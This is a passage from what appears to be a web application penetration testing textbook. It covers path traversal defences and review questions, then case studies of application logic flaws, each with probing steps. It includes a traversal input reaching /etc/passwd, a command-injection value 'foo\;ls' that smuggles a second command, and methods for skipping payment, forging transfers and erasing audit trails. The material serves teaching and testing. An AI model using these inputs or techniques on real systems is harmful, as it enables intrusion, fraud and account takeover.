70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 345

directory is treated as if it is the file system root, and any redundant tra-

versal sequences that attempt to step up above it are ignored.

Chrooted file systems are supported natively on most Unix-based plat-

forms. A similar effect can be achieved on Windows platforms (in rela-

tion to traversal vulnerabilities, at least) by mounting the relevant start

directory as a new logical drive and using the associated drive letter to

access its contents.

■■

The application should integrate its defenses against path traversal

attacks with its logging and alerting mechanisms. Whenever a request

is received that contains path traversal sequences, this indicates likely

malicious intent on the part of the user, and the application should log

the request as an attempted security breach, terminate the user’s ses-

sion, and if applicable, suspend the user’s account and generate an alert

to an administrator.

Chapter Summary

Path traversal can often be a devastating vulnerability, enabling you to break

through many layers of security controls to gain direct access to sensitive data,

including passwords, configuration files, application logs, and source code. If

the vulnerability grants write access, it can quickly lead to a complete com-

promise of the application and underlying server.

Path traversal bugs are surprisingly common; however, they are often sub-

tle to detect and may be protected by various kinds of input validation which

deflect the most obvious attacks but can nevertheless be bypassed with skill

and determination. The most important lesson when probing for path traver-

sal flaws is to be patient and work systematically to try to understand pre-

cisely how your input is being handled, and how the server’s processing can

be manipulated to achieve success.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. You insert a standard path traversal detection string into the

following URL:

https://wahh-app.com/logrotate.pl?file=../../../../../etc/passwd

346 Chapter 10 ■ Exploiting Path Traversal

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 346

The application returns the following error message:

passwd.log not found in /etc directory!

What input should you submit next to try to retrieve the passwd file?

2. You are probing for path traversal flaws in a file download function.

The following URL returns the file called

foo.txt:

https://wahh-app.com/showFile.php?f=foo.txt

After some experimentation, you discover that supplying the input

../foo.txt returns the original file, whereas supplying the input

bar/../foo.txt returns an error.

What might be the cause of this unusual behavior, and how can you

attempt to refine your attack?

3. An application uses URLs like the following to view various configura-

tion files:

https://wahh-app.com/manage/customize.asp?file=default.xml

You have determined that the file specified is normally retrieved from

the

/contrib directory within the web root. However, requesting the

following URL:

https://wahh-app.com/manage/customize.asp?file=../../../../boot.ini

results in an HTTP 500 status code and the following error message:

Microsoft VBScript runtime (0x800A0046)

Permission denied

What is the likely cause of this message, and how can you proceed

towards exploitation?

4. You have located a file handling function that appears to be vulnerable

to path traversal attacks. However, you have no idea what the location

of the starting directory is, or how many traversal sequences you need

to insert to get to the file system root. How can you proceed without

this information?

5. You have located a path traversal vulnerability. However the starting

directory is within a separate logical volume that is only used for

hosted web content. Is it possible to exploit this vulnerability to any

malicious effect?

Chapter 10 ■ Exploiting Path Traversal 347

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 347

70779c10.qxd:WileyRed 9/14/07 3:14 PM Page 348

349

Attacking Application Logic

CHAPTER

All web applications employ logic in order to deliver their functionality. Writ-

ing code in a programming language involves at its root nothing more than

breaking down a complex process into very simple and discrete logical steps.

Translating a piece of functionality that is meaningful to human beings into

a sequence of small operations that can be executed by a computer involves a

great deal of skill and discretion. Doing it in an elegant and secure fashion is

even harder still. When large numbers of different designers and program-

mers work in parallel on the same application, there is ample opportunity for

mistakes to occur.

In all but the very simplest of web applications, a vast amount of logic is

performed at every stage. This logic presents an intricate attack surface that

is always present but often overlooked. Many code reviews and penetration

tests focus exclusively on the common “headline” vulnerabilities like SQL

injection and cross-site scripting, because these have an easily recognizable

signature and well-researched exploitation vector. By contrast, flaws in an

application’s logic are harder to characterize: each instance may appear to be a

unique one-off occurrence, and they are not usually identified by any auto-

mated vulnerability scanners. As a result, they are not generally as well appre-

ciated or understood, and they are therefore of great interest to an attacker.

In this chapter, we will describe the kinds of logic flaws that often exist in web

applications and the practical steps that you can take to probe and attack an

application’s logic. We will present a series of real-world examples, each of which

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 349

manifests a different kind of logical defect and which together serve to illustrate

the variety of assumptions made by designers and developers that can lead

directly to faulty logic, and expose an application to security vulnerabilities.

The Nature of Logic Flaws

Logic flaws in web applications are extremely varied. They range from simple

bugs manifested in a handful of lines of code, to extremely complex vulnera-

bilities arising from the interoperation of several core components of the appli-

cation. In some instances, they may be obvious and trivial to detect; in other

cases, they may be exceptionally subtle and liable to elude even the most rig-

orous code review or penetration test.

Unlike other coding flaws such as SQL injection or cross-site scripting,

there is no common “signature” associated with logic flaws. The defining

characteristic, of course, is that the logic implemented within the application

is defective in some way. In many cases, the defect can be represented in

terms of a specific assumption that has been made in the thinking of the

designer or developer, either explicitly or implicitly, and that turns out to be

flawed. In general terms, a programmer may have reasoned something like

“If A happens, then B must be the case, so I will do C.” The programmer did

not ask the entirely different question “But what if X occurs?” and so failed

to take account of a scenario that violates the assumption. Depending on the

circumstances, this flawed assumption may open up a significant security

vulnerability.

As awareness of common web application vulnerabilities has increased in

recent years, the incidence and severity of some categories of vulnerability

have declined noticeably. However, because of the nature of logic flaws, it is

unlikely that they will ever be completely eliminated via standards for secure

development, use of code-auditing tools, or normal penetration testing. The

diverse nature of logic flaws, and the fact that detecting and preventing them

often requires a good measure of lateral thinking, suggests that they will be

prevalent for a good while to come. Any serious attacker, therefore, needs to

pay serious attention to the logic employed in the application being targeted,

to try to figure out the assumptions that designers and developers are likely to

have made, and then to think imaginatively about how those assumptions

may be violated.

Real-World Logic Flaws

The best way to learn about logic flaws is not by theorizing, but through

acquaintance with some actual examples. Although individual instances of

350 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 350

logic flaws differ hugely, they share many common themes, and they demon-

strate the kinds of mistake that human developers will always be prone to

making. Hence, insights gathered from studying a sample of logic flaws

should help you to uncover new flaws in entirely different situations.

Example 1: Fooling a Password Change Function

The authors have encountered this logic flaw in a web application imple-

mented by a financial services company and also in the AOL AIM Enterprise

Gateway application.

The Functionality

The application implemented a password change function for end users. It

required the user to fill out fields for username, existing password, new pass-

word, and confirm new password.

There was also a password change function for use by administrators. This

allowed them to change the password of any user without the need to supply

the existing password. The two functions were implemented within the same

server-side script.

The Assumption

The client-side interface presented to users and administrators differed in one

respect — the administrator’s interface did not contain a field for an existing

password. When the server-side application processed a password change

request, it used the presence or absence of the existing password parameter to

indicate whether the request was from an administrator or an ordinary user. In

other words, it assumed that ordinary users would always supply an existing

password parameter.

The code responsible looked something like this:

String existingPassword = request.getParameter(“existingPassword”);

if (null == existingPassword)

{

trace(“Old password not supplied, must be an administrator”);

return true;

}

else

{

trace(“Verifying user’s old password”);

...

Chapter 11 ■ Attacking Application Logic 351

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 351

The Attack

Once the assumption has been explicitly stated in this way, the logic flaw

becomes obvious. Of course, an ordinary user can issue a request that does not

contain an existing password parameter, because users control every aspect of

the requests they issue.

This logic flaw was devastating for the application. It enabled an attacker to

reset the password of any other user and so take full control of their account.

HACK STEPS

■ When probing key functionality for logic flaws, try removing in turn each

parameter submitted in requests, including cookies, query string fields,

and items of POST data.

■ Be sure to delete the actual name of the parameter as well as its value.

Do not just submit an empty string, as this is typically handled differently

by the server.

■ Attack only one parameter at a time, to ensure that all relevant code

paths within the application are reached.

■ If the request you are manipulating is part of a multistage process, fol-

low the process through to completion, because some later logic may

process data that was supplied in earlier steps and stored within the

session.

Example 2: Proceeding to Checkout

The authors encountered this logic flaw in the web application employed by

an online retailer.

The Functionality

The process of placing an order involved the following stages:

1. Browse the product catalog and add items to the shopping basket.

2. Return to the shopping basket and finalize the order.

3. Enter payment information.

4. Enter delivery information.

352 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 352

Chapter 11 ■ Attacking Application Logic 353

The Assumption

The developers assumed that users would always access the stages in the

intended sequence, because this was the order in which the stages are deliv-

ered to the user by the navigational links and forms presented to their browser.

Hence, any user who completed the order process must have submitted satis-

factory payment details along the way.

The Attack

The developers’ assumption was flawed for fairly obvious reasons. Users con-

trol every request that they make to the application and so can access any stage

of the ordering process in any sequence. By proceeding directly from stage 2 to

stage 4, an attacker could generate an order that was finalized for delivery but

that had not actually been paid for.

HACK STEPS

The technique for finding and exploiting flaws of this kind is known as forced

browsing. This involves circumventing any controls imposed by in-browser

navigation on the sequence in which application functions may be accessed:

■ When a multistage process involves a defined sequence of requests,

attempt to submit these requests out of the expected sequence. Try skip-

ping certain stages altogether, accessing a single stage more than once,

and accessing earlier stages after later ones.

■ The sequence of stages may be accessed via a series of GET or POST

requests for distinct URLs, or they may involve submitting different sets

of parameters to the same URL. The stage being requested may be speci-

fied by submitting a function name or index within a request parameter.

Be sure to understand fully the mechanisms that the application is

employing to deliver access to distinct stages.

■ From the context of the functionality that is implemented, try to under-

stand what assumptions may have been made by developers and where

the key attack surface lies. Try to identify ways of violating those

assumptions to cause undesirable behavior within the application.

■ When multistage functions are accessed out of sequence, it is common

to encounter a variety of anomalous conditions within the application,

such as variables with null or uninitialized values, a partially defined or

inconsistent state, and other unpredictable behavior. In this situation, the

application may return interesting error message and debug output,

which can be used to better understand its internal workings and thereby

fine-tune the current or a different attack (see Chapter 14). Sometimes,

the application may get into a state entirely unanticipated by developers,

which may lead to serious security flaws.

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 353

NOTE Many types of access control vulnerability are similar in nature

to this logic flaw. When a privileged function involves multiple stages that are

normally accessed in a defined sequence, the application may assume that

users will always proceed through the functionality in this sequence. The

application may enforce strict access control on the initial stages of the process

and assume that any user who reaches the later stages must, therefore, be

authorized. If a low-privileged user proceeds directly to a later stage, she may

be able to access it without any restrictions. See Chapter 8 for more details

on finding and exploiting vulnerabilities of this kind.

Example 3: Rolling Your Own Insurance

The authors encountered this logic flaw in a web application deployed by a

financial services company.

The Functionality

The application enabled users to obtain quotations for insurance, and if desired,

complete and submit an insurance application online. The process was spread

across a dozen stages, as follows:

■■

At the first stage, the applicant submits some basic information, and

specifies either a preferred monthly premium or the value the applicant

wishes insurance for. The application offers a quotation, computing

whichever value the applicant did not specify.

■■

Across several stages, the applicant supplies various other personal

details, including health, occupation, and pastimes.

■■

Finally, the application is transmitted to an underwriter working for the

insurance company. Using the same web application, the underwriter

reviews the details and decides whether to accept the application as is,

or modify the initial quotation to reflect any additional risks.

Through each of the stages described, the application employed a shared

component to process each parameter of user data submitted to it. This com-

ponent parsed out all of the data in each

POST request into name/value pairs,

and updated its state information with each item of data received.

The Assumption

The component which processed user-supplied data assumed that each

request would contain only the parameters that had been requested from the

354 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 354

Chapter 11 ■ Attacking Application Logic 355

user in the relevant HTML form. Developers did not consider what would

happen if a user submitted parameters that they had not been asked to supply.

The Attack

Of course, the assumption was flawed, because users can submit arbitrary

parameter names and values with every request. As a result, the core func-

tionality of the application was broken in various ways:

■■

An attacker could exploit the shared component to bypass all server-

side input validation. At each stage of the quotation process, the appli-

cation performed strict validation of the data expected at that stage, and

rejected any data that failed this validation. But the shared component

updated the application’s state with every parameter supplied by the

user. Hence, if an attacker submitted data out of sequence, by supply-

ing a name/value pair which the application expected at an earlier

stage, then that data would be accepted and processed, with no valida-

tion having been performed. As it happened, this possibility paved the

way for a stored cross-site scripting attack targeting the underwriter,

which allowed a malicious user to access the personal information

belonging to other applicants (see Chapter 12).

■■

An attacker could buy insurance at an arbitrary price. At the first stage

of the quotation process, the applicant specified either their preferred

monthly premium or the value they wished to insure, and the applica-

tion computed the other item accordingly. However, if a user supplied

new values for either or both of these items at a later stage, then the

application’s state was updated with these values. By submitting these

parameters out of sequence, an attacker could obtain a quotation for

insurance at an arbitrary value and arbitrary monthly premium.

■■

There were no access controls regarding which parameters a given

type of user could supply. When an underwriter reviewed a completed

application, they updated various items of data, including the accep-

tance decision. This data was processed by the shared component in

the same way as for data supplied by an ordinary user. If an attacker

knew or guessed the parameter names used when the underwriter

reviewed an application, then the attacker could simply submit

these, thereby accepting their own application without any actual

underwriting.

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 355

HACK STEPS

The flaws in this application were absolutely fundamental to its security, but

none of them would have been identified by an attacker who simply

intercepted browser requests and modified the parameter values being

submitted.

■ Whenever an application implements a key action across multiple stages,

you should take parameters that are submitted at one stage of the

process, and try submitting these to a different stage. If the relevant

items of data are updated within the application’s state, you should

explore the ramifications of this behavior, to determine whether you can

leverage it to carry out any malicious action, as in the preceding three

examples.

■ If the application implements functionality whereby different categories

of user can update or perform other actions on a common collection of

data, you should walk through the process using each type of user and

observe the parameters submitted. Where different parameters are ordi-

narily submitted by the different users, take each parameter submitted

by one user and try to submit this as the other user. If the parameter is

accepted and processed as that user, explore the implications of this

behavior as previously described.

Example 4: Breaking the Bank

The authors encountered this logic flaw in the web application deployed by a

major financial services company.

The Functionality

The application enabled existing customers who did not already use the online

application to register to do so. New users were required to supply some basic

personal information, to provide a degree of assurance of their identity. This

information included name, address, and date of birth, but did not include

anything secret such as an existing password or PIN number.

When this information had been correctly entered, the application for-

warded the registration request to back-end systems for processing. An infor-

mation pack was mailed to the user’s registered home address. This pack

included instructions for activating their online access via a telephone call to

the company’s call center and also a one-time password to use when first log-

ging in to the application.

356 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 356

The Assumption

The application’s designers believed that this mechanism provided a very

robust defense against unauthorized access to the application. The mechanism

implemented three layers of protection:

■■

A modest amount of personal data was required up front, to deter a

malicious attacker or mischievous user from attempting to initiate the

registration process on other users’ behalf.

■■

The process involved transmitting a key secret out-of-band to the cus-

tomer’s registered home address. Any attacker would need to have

access to the victim’s personal mail.

■■

The customer was required to telephone the call center and authenticate

himself there in the usual way, based on personal information and

selected digits from a PIN number.

This design was indeed robust. The logic flaw lay in the actual implementa-

tion of the mechanism.

The developers implementing the registration mechanism needed a way to

store the personal data submitted by the user and correlate this with a unique

customer identity within the company’s database. Keen to reuse existing code,

they came across the following class, which appeared to serve their purposes:

class CCustomer

{

String firstName;

String lastName;

CDoB dob;

CAddress homeAddress;

long custNumber;

...

After the user’s information was captured, this object was instantiated, pop-

ulated with the supplied information, and stored in the user’s session. The

application then verified the user’s details, and if they were valid, retrieved

that user’s unique customer number, which was used in all of the company’s

systems. This number was added to the object, together with some other use-

ful information about the user. The object was then transmitted to the relevant

back-end system for the registration request to be processed.

The developers assumed that making use of this code component was

harmless and would not lead to any security problem. However, the assump-

tion was flawed, with serious consequences.

Chapter 11 ■ Attacking Application Logic 357

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 357

The Attack

The same code component that was incorporated into the registration func-

tionality was also used elsewhere within the application, including within the

core functionality, which gave authenticated users access to account details,

statements, funds transfers, and other information. When a registered user

successfully authenticated herself to the application, this same object was

instantiated and saved in her session to store key information about her iden-

tity. The majority of the functionality within the application referenced the

information within this object in order to carry out its actions — for example,

the account details presented to the user on her main page were generated on

the basis of the unique customer number contained within this object.

The way in the code component was already being employed within the

application meant that the developers’ assumption was flawed, and the man-

ner in which they reused it did indeed open up a significant vulnerability.

Although the vulnerability was serious, it was in fact relatively subtle to

detect and exploit. Access to the main application functionality was protected

by access controls at several layers, and a user needed to have a fully authen-

ticated session to pass these controls. To exploit the logic flaw, therefore, an

attacker needed to perform the following steps:

■■

Using the resulting authenticated session, access the registration func-

tionality and submit a different customer’s personal information. This

causes the application to overwrite the original

CCustomer object in the

attacker’s session with a new object relating to the targeted customer.

■■

Return to the main application functionality and access the other cus-

tomer’s account.

A vulnerability of this kind is not straightforward to detect when probing

the application from a black-box perspective. However, it is also hard to iden-

tify when reviewing or writing the actual source code. Without a clear under-

standing of the application as a whole and the use made of different

components in different areas, the flawed assumption made by developers

may not be evident. Of course, clearly commented source code and design

documentation would reduce the likelihood of such a defect being introduced

or remaining undetected.

358 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 358

Chapter 11 ■ Attacking Application Logic 359

HACK STEPS

■ In a complex application involving either horizontal or vertical privilege

segregation, try to locate any instances where an individual user can

accumulate an amount of state within their session which relates in

some way to their identity.

■ Try to step through one area of functionality, and then switch altogether

to an unrelated area, to determine whether any accumulated state infor-

mation has an effect on the application’s behavior.

Example 5: Erasing an Audit Trail

The authors encountered this logic flaw in a web application used in a call center.

The Functionality

The application implemented various functions enabling helpdesk personnel

and administrators to support and manage a large user base. Many of these

functions were security-sensitive, including the creation of accounts and the

resetting of passwords. Hence, the application maintained a full audit trail,

recording every action performed and the identity of the user responsible.

The application included a function allowing administrators to delete audit

trail entries. However to protect this function from being maliciously exploited,

any use of the function was itself recorded, so the audit trail would indicate the

identity of the user responsible.

The Assumption

The designers of the application believed that it would be impossible for a

malicious user to perform an undesirable action without leaving some evi-

dence in the audit trail that would link them to the action. An attempt by an

administrator to cleanse the audit logs altogether would always leave one last

entry that would point the finger of suspicion at them.

The Attack

The designers’ assumption was flawed, and it was possible for a malicious

administrative user to carry out arbitrary actions without leaving any

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 359

360 Chapter 11 ■ Attacking Application Logic

evidence within the audit trail that could identify them as responsible. The

steps required are:

1. Log in using your own account, and create a second user account.

2. Assign all of your privileges to the new account.

3. Use the new account to perform a malicious action of your choice.

4. Use the new account to delete all of the audit log entries generated by

the first three steps.

Each of these actions generates entries in the audit log. However, in the last

step, the attacker deletes all of the entries created by the preceding actions. The

audit log now contains a single suspicious entry, indicating that some log

entries were deleted by a specific user — that is, by the new user account that

was created by the attacker. However, because the previous log entries have

been deleted, there is nothing in the logs to link the attacker to anything sus-

picious. The perfect crime.

NOTE This type of flaw can also be found in some security models that

require dual authorization for security-critical actions. If an attacker can create

a new account and use it to provide secondary authorization for a malicious

action that he performs, then the additional defense provided by the model can

be trivially circumvented.

It is also worth noting that even without the facility to delete audit trail

entries, the ability to create other powerful user accounts may make audit trails

difficult to follow, potentially requiring a large number of entries to be traced

through to identify a perpetrator.

Example 6: Beating a Business Limit

The authors encountered this logic flaw in a web-based enterprise resource

planning application used within a manufacturing company.

The Functionality

Finance personnel had the facility to perform funds transfers between various

bank accounts owned by the company and their key customers and suppliers.

As a precaution against fraud, the application prevented most users from pro-

cessing transfers with a value greater than $10,000. Any transfer larger than

this required a senior manager’s approval.

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 360

The Assumption

The code responsible for implementing this check within the application was

extremely simple:

bool CAuthCheck::RequiresApproval(int amount)

{

if (amount <= m_apprThreshold)

return false;

else return true;

}

The developer assumed that this transparent check was bulletproof. No

transaction for greater than the configured threshold could ever escape the

requirement for secondary approval.

The Attack

The developer’s assumption was flawed because he had completely over-

looked the possibility that a user would attempt to process a transfer for a neg-

ative amount. Any negative number will clear the approval test, because it is

less than the threshold. However, the banking module of the application

accepted negative transfers and simply processed them as positive transfers in

the opposite direction. Hence, any user wishing to transfer $20,000 from

account A to account B could simply initiate a transfer of -$20,000 from account

B to account A, which had the same effect and required no approval. The anti-

fraud defenses built into the application could be trivially bypassed!

NOTE Many kinds of web applications employ numeric limits within their

business logic. For example:

■■

A retailing application may prevent a user from ordering more than the

number of units available in stock.

■■

A banking application may prevent a user from making bill payments

that exceed her current account balance.

■■

An insurance application may adjust its quotations based on age

thresholds.

Finding a means of beating such limits will often not represent a security

compromise of the application itself. However it may have serious business

consequences and represent a breach of the controls that the owner is relying

on the application to enforce.

Chapter 11 ■ Attacking Application Logic 361

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 361

The most obvious vulnerabilities of this kind will often be detected during the

user-acceptance testing that normally occurs before an application is launched.

However, more subtle manifestations of the problem may remain, particularly

when hidden parameters are being manipulated.

HACK STEPS

The first step in attempting to beat a business limit is to understand what

characters are accepted within the relevant input which you control.

■ Try entering negative values and see if these are accepted by the applica-

tion and processed in the way that you would expect.

■ You may need to perform several steps in order to engineer a change in

the application’s state that can be exploited for a useful purpose. For

example, several transfers between accounts may be required until a

suitable balance has been accrued that can actually be extracted.

Example 7: Cheating on Bulk Discounts

The authors encountered this logic flaw in the retail application of a software

vendor.

The Functionality

The application allowed users to order software products and qualify for bulk

discounts if a suitable bundle of items was purchased. For example, users who

purchased an antivirus solution, personal firewall, and anti-spam software

were entitled to a 25% discount on their individual prices.

The Assumption

When a user added an item of software to his shopping basket, the application

used various rules to determine whether the bundle of purchases he had cho-

sen entitled him to any discount. If so, the prices of the relevant items within

the shopping basket were adjusted in line with the discount. The developers

assumed that the user would go on to purchase the chosen bundle and so be

entitled to the discount.

The Attack

The developers’ assumption is rather obviously flawed and ignores the fact

that users may remove items from their shopping baskets after they have been

362 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 362

added. A crafty user could add to his basket large quantities of every single

product on sale from the vendor, to attract the maximum possible bulk dis-

counts. When the discounts had been applied to items in the shopping basket,

he could remove items he did not require and still receive the discounts

applied to the remaining products.

HACK STEPS

■ In any situation where prices or other sensitive values are adjusted

based on criteria that are determined by user-controllable data or

actions, first understand the algorithms used by the application, and the

point within its logic where adjustments are made. Identify whether

these adjustments are made on a one-time basis or whether they are

revised in response to further actions performed by the user.

■ Think imaginatively, and try to find a way of manipulating the applica-

tion’s behavior to cause it to get into a state where the adjustments it

has applied do not correspond to the original criteria intended by its

designers. In the most obvious case, as just described, this may simply

involve removing items from a shopping cart after a discount has been

applied!

Example 8: Escaping from Escaping

The authors encountered this logic flaw in various web applications, including

the web administration interface used by a network intrusion detection product.

The Functionality

The application’s designers had decided to implement some functionality that

involved passing user-controllable input as an argument to an operating sys-

tem command. The application’s developers understood the inherent risks

involved in this kind of operation (see Chapter 9) and decided to defend

against these risks by sanitizing any potentially malicious characters within

the user input. Any instance of the following would be escaped using the back-

slash character:

; | & < > ` space and newline

Escaping data in this way causes the shell command interpreter to treat the

relevant characters as part of the argument being passed to the invoked com-

mand, rather than as shell metacharacters that could be used to inject addi-

tional commands or arguments, redirect output, and so on.

Chapter 11 ■ Attacking Application Logic 363

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 363

364 Chapter 11 ■ Attacking Application Logic

The Assumption

The developers were certain that they had devised a robust defense against

command injection attacks. They had brainstormed every possible character

that might assist an attacker, and had ensured that they were all properly

escaped and therefore made safe.

The Attack

The developers forgot to escape the escape character itself.

The backslash character is not normally of direct use to an attacker when

exploiting a simple command injection flaw, and so the developers did not

identify it as potentially malicious. However, by failing to escape it, they pro-

vide a means for the attacker to defeat their sanitizing mechanism altogether.

Suppose an attacker supplies the following input to the vulnerable function:

foo\;ls

The application applies the relevant escaping, as described previously, and

so the attacker’s input becomes:

foo\\;ls

When this data is passed as an argument to the operating system command,

the shell interpreter treats the first backslash as the escape character, and so

treats the second backslash as a literal backslash — not an escape character but

part of the argument itself. It then encounters a semicolon that is apparently

not escaped. It treats this as a command separator and so goes on to execute

the injected command supplied by the attacker.

HACK STEPS

Whenever you are probing an application for command injection and other

flaws, having attempted to insert the relevant metacharacters into the data you

control, always try placing a backslash immediately before each such character,

to test for the logic flaw described previously.

NOTE This same flaw can be found in some defenses against cross-site

scripting attacks (see Chapter 12). When user-supplied input is copied directly

into the value of a string variable in a piece of JavaScript, this value is

encapsulated within quotation marks. To defend themselves against XSS, many

applications use backslashes to escape any quotation marks that appear within

the user’s input. However, if the backslash character itself is not escaped, then

an attacker can submit \‘ to break out of the string and so take control of the

script. This exact bug was found in early versions of the Ruby On Rails

framework, in the escape_javascript function.

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 364

Example 9: Abusing a Search Function

The authors encountered this logic flaw in an application providing subscription-

based access to financial news and information. The same vulnerability was later

found in two completely unrelated applications, illustrating the subtle and per-

vasive nature of many logic flaws.

The Functionality

The application provided access to a huge archive of historical and current

information, including company reports and accounts, press releases, market

analyses, and the like. Most of this information was accessible only to paying

subscribers.

The application provided a powerful and fine-grained search function,

which could be accessed by all users. When an anonymous user performed

a query, the search function returned links to all documents that matched the

query. However, the user would be required to subscribe in order to retrieve

any of the actual protected documents that their query returned. The applica-

tion’s owners regarded this behavior as a useful marketing tactic.

The Assumption

The application’s designer assumed that users could not use the search func-

tion to extract any useful information without paying for it. The document

titles listed in the search results were typically cryptic — for example, “Annual

Results 2006,” “Press Release 08-03-2007,” and so on.

The Attack

Because the search function indicated the number of documents that matched

a given query, a wily user could issue a large number of queries and use infer-

ence to extract information from the search function that would normally need

to be paid for. For example, the following queries could be used to zero in on

the contents of an individual protected document:

wahh consulting

>> 276 matches

wahh consulting “Press Release 08-03-2007” merger

>> 0 matches

wahh consulting “Press Release 08-03-2007” share issue

>> 0 matches

wahh consulting “Press Release 08-03-2007” dividend

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover

>> 1 match

Chapter 11 ■ Attacking Application Logic 365

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 365

366 Chapter 11 ■ Attacking Application Logic

wahh consulting “Press Release 08-03-2007” takeover haxors inc

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover uberleet ltd

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover script kiddy corp

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover ngs

>> 1 match

wahh consulting “Press Release 08-03-2007” takeover ngs announced

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover ngs cancelled

>> 0 matches

wahh consulting “Press Release 08-03-2007” takeover ngs completed

>> 1 match

Although the user cannot view the actual document itself, with sufficient

imagination and use of scripted requests, he may be able to build up a fairly

accurate understanding of its contents.

TIP In certain situations, an ability to leach information via a search function

in this way may be critical to the security of the application itself — effectively

disclosing details of administrative functions, passwords, and technologies

in use.

Example 10: Snarfing Debug Messages

The authors encountered this logic flaw in a web application used by a finan-

cial services company.

The Functionality

The application was only recently deployed and like much new software still

contained a number of functionality-related bugs. Intermittently, various oper-

ations would fail in an unpredictable way, and users would be presented with

an error message.

To facilitate the investigation of errors, developers decided to include

detailed verbose information in these messages, including the following

details:

■■

The user’s identity.

■■

The token for the current session.

■■

The URL being accessed.

■■

All of the parameters supplied with the request which generated the

error.

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 366

Generating these messages had proved useful when helpdesk personnel

attempted to investigate and recover from system failures, and were helping to

iron out the remaining functionality bugs.

The Assumption

Despite the usual warnings from security advisers that verbose debug mes-

sages of this kind could potentially be misused by an attacker, the developers

reasoned that they were not opening up any security vulnerability. All of the

information contained within the debugging message could be readily

obtained by the user, by inspecting the requests and responses processed by

her browser. The messages did not include any details about the actual failure,

such as stack traces, and so could not conceivably assist in formulating an

attack against the application.

The Attack

Despite their reasoning about the contents of the debug messages, the devel-

opers’ assumption was flawed because of mistakes they made in implement-

ing the creation of debugging messages.

When an error occurred, a component of the application gathered all of the

required information and stored it. The user was issued with an HTTP redirect

to a URL that displayed this stored information. The problem was that the

application’s storage of debug information, and user access to the error mes-

sage, was not session-based. Rather, the debugging information was stored in

a static container, and the error message URL always displayed the informa-

tion which was last placed into this container. Developers had assumed that

users following the redirect would, therefore, see only the debug information

relating to their error.

In fact, in this situation, ordinary users would occasionally be presented

with the debugging information relating to a different user’s error, because the

two errors had occurred almost simultaneously. But aside from questions

about thread safety (see the next example), this was not simply a race condi-

tion. An attacker who discovered the way in which the error mechanism func-

tioned could simply poll the message URL repeatedly, and log the results each

time they changed. Over a period of few hours, this log would contain sensi-

tive data about numerous application users:

■■

A set of usernames that could be used in a password-guessing attack.

■■

A set of session tokens that could be used to hijack sessions.

■■

A set of user-supplied input, which may contain passwords and other

sensitive items.

Chapter 11 ■ Attacking Application Logic 367

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 367

The error mechanism, therefore, presented a critical security threat. Because

administrative users sometimes received these detailed error messages, an

attacker monitoring error messages would soon obtain sufficient information

to compromise the entire application.

HACK STEPS

■ To detect a flaw of this kind, first catalog all of the anomalous events and

conditions that can be generated and that involve interesting user-spe-

cific information being returned to the browser in an unusual way, such

as a debugging error message.

■ Using the application as two users in parallel, systematically engineer

each condition using one or both users, and determine whether the other

user is affected in each case.

Example 11: Racing against the Login

This logic flaw has affected several major applications in the recent past.

The Functionality

The application implemented a robust, multistage login process in which

users were required to supply several different credentials to gain access.

The Assumption

The authentication mechanism had been subject to numerous design reviews

and penetration tests. The owners were confident that no feasible means

existed of attacking the mechanism to gain unauthorized access.

The Attack

In fact, the authentication mechanism contained a subtle flaw. Very occasion-

ally, when a customer logged in, he gained access to the account of a com-

pletely different user, enabling him to view all of that user’s financial details,

and even make payments from the other user’s account. The application’s

behavior appeared initially to be completely random: the user had not per-

formed any unusual action in order to gain unauthorized access, and the

anomaly did not recur on subsequent logins.

After some investigation, the bank discovered that the error was occurring

when two different users logged in to the application at precisely the same

moment. It did not occur on every such occasion — only on a subset of them.

368 Chapter 11 ■ Attacking Application Logic

70779c11.qxd:WileyRed 9/14/07 3:14 PM Page 368

Chapter 11 ■ Attacking Application Logic 369

The root cause was that the application was briefly storing a key identifier

about each newly authenticated user within a static (nonsession) variable.

After being written, this variable’s value was read back an instant later. If a dif-

ferent thread (processing another login) had written to the variable during this

instant, the earlier user would land in an authenticated session belonging to

the subsequent user.

The vulnerability arose from the same kind of mistake as in the error mes-

sage example described previously: the application was using static storage to

hold information that ought to have been stored on a per-thread or per-session

basis. However, the present example is far more subtle to detect, and is more

difficult to exploit because it cannot be reliably reproduced.

Flaws of this kind are known as “race conditions” because they involve a

vulnerability that arises for a brief period of time during certain specific cir-

cumstances. Because the vulnerability exists only for a short time, an attacker

faces a “race” to exploit it before the application closes it again. In cases where

the attacker is local to the application, it is often possible to engineer the exact

circumstances in which the race condition arises, and reliably exploit the vul-

nerability during the available window. Where the attacker is remote to the

application, this is normally much harder to achieve.

A remote attacker who understood the nature of the vulnerability could

conceivably have devised an attack to exploit it, by using a script to log in con-

tinuously and check the details of the account accessed. But the tiny window

during which the vulnerability could be exploited meant that a huge number

of requests would be required.

It was not surprising that the race condition was not discovered during nor-

